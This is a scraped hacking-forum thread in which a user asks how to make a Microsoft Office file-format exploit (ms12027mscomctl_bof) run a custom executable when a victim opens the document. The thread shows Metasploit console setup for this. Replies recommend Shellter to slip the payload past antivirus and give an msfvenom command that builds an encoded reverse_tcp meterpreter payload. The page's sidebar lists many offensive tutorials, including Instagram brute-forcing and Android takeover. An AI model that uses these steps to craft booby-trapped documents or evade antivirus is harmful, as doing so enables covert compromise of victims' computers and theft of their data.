I have my exploit already but I don't want to use any meterpreter payload. I want to use putty.exe as for example. How would I do that?
Basically the exploit I am using is an Microsoft Office exploit how it works is when the target opens the doc file the payload executes.
Forum Thread:
How to Track Who Is Sms Bombing Me .
4
Replies
Forum Thread:
Removing Pay-as-You-Go Meter on Loan Phones.
1
Replies
Forum Thread:
Hydra Syntax Issue Stops After 16 Attempts
3
Replies
Forum Thread:
moab5.Sh Error While Running Metasploit
17
Replies
Forum Thread:
Execute Reverse PHP Shell with Metasploit
1
Replies
Forum Thread:
Install Metasploit Framework in Termux No Root Needed M-Wiz Tool
1
Replies
Forum Thread:
Hack and Track People's Device Constantly Using TRAPE
35
Replies
Forum Thread:
When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen.
8
Replies
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
12
Replies
Forum Thread:
Hack Instagram Account Using BruteForce
208
Replies
Forum Thread:
Metasploit reverse_tcp Handler Problem
47
Replies
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
22
Replies
Metasploit Error:
Handler Failed to Bind
41
Replies
Forum Thread:
How to Hack Android Phone Using Same Wifi
21
Replies
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
177
Replies
How to:
Crack Instagram Passwords Using Instainsane
36
Replies
Forum Thread:
How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More
5
Replies
Forum Thread:
How Many Hackers Have Played Watch_Dogs Game Before?
13
Replies
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
55
Replies
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
10
Replies
How To:
Scan for Vulnerabilities on Any Website Using Nikto
How To:
Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
How To:
Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
How To:
Top 10 Things to Do After Installing Kali Linux
How To:
Spy on Traffic from a Smartphone with Wireshark
How To:
Escape Restricted Shell Environments on Linux
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
How To:
Use Metasploit's WMAP Module to Scan Web Applications for Common Vulnerabilities
How To:
Intercept Images from a Security Camera Using Wireshark
How To:
Use SQL Injection to Run OS Commands & Get a Shell
How To:
Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+
Steganography:
How to Hide Secret Data Inside an Image or Audio File in Seconds
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
How To:
Fix Bidirectional Copy/Paste Issues for Kali Linux Running in VirtualBox
How To:
Exploit EternalBlue on Windows Server with Metasploit
How To:
Crack Shadow Hashes After Getting Root on a Linux System
How To:
Brute-Force FTP Credentials & Get Server Access
How To:
Hack Networks & Devices Right from Your Wrist with the Wi-Fi Deauther Watch
How To:
Use Ettercap to Intercept Passwords with ARP Spoofing
6 Responses
Shellter is good for this. It encrypts the file, so it can get past most AVs (mine wasn't detected by any), and if you have a normal, non-malicious .exe, I'm pretty sure it will still work, but it will also create a connection. Here is an article talking about its usage:
https://null-byte.wonderhowto.com/how-to/create-undetectable-trojan-using-domain-name-0171563/
I want to add a exe to my document file I am using this exploit
odule options (exploit/windows/fileformat/ms12027mscomctl_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
Exploit target:
Id Name
-- ----
0 Microsoft Office 2007 no-SP/SP1/SP2/SP3 English on Windows XP SP3 / 7 SP1 English
msf exploit(ms12027mscomctl_bof) > set FILENAME test.doc
FILENAME => test.doc
msf exploit(ms12027mscomctl_bof) > show options
Module options (exploit/windows/fileformat/ms12027mscomctl_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME test.doc yes The file name.
Exploit target:
Id Name
-- ----
0 Microsoft Office 2007 no-SP/SP1/SP2/SP3 English on Windows XP SP3 / 7 SP1 English
msf exploit(ms12027mscomctl_bof) > use payload/generic/custom
msf payload(custom) > show options
Module options (payload/generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE no The file to read the payload from
PAYLOADSTR no The string to use as a payload
msf payload(custom) > set PAYLOAD FILE /root/Downloads/putty.exe
msf payload(custom) > /root/Downloads/putty.exe
* exec: /root/Downloads/putty.exe
Oh, I misunderstood what you wanted to do.
set PAYLOAD generic/custom
set PAYLOADFILE /path/to/payload
try this command instead of "set PAYLOAD":
set EXE /root/Downloads/putty.exe
I'm not sure though, but give it a shot, maybe it's your lucky day
You could do msfvenom -p windows/meterpreter/reversetcp lhost=192.168.1.2 lport=4444 -e x86/shikataga_nai -i 20 -t putty.exe
Share Your Thoughts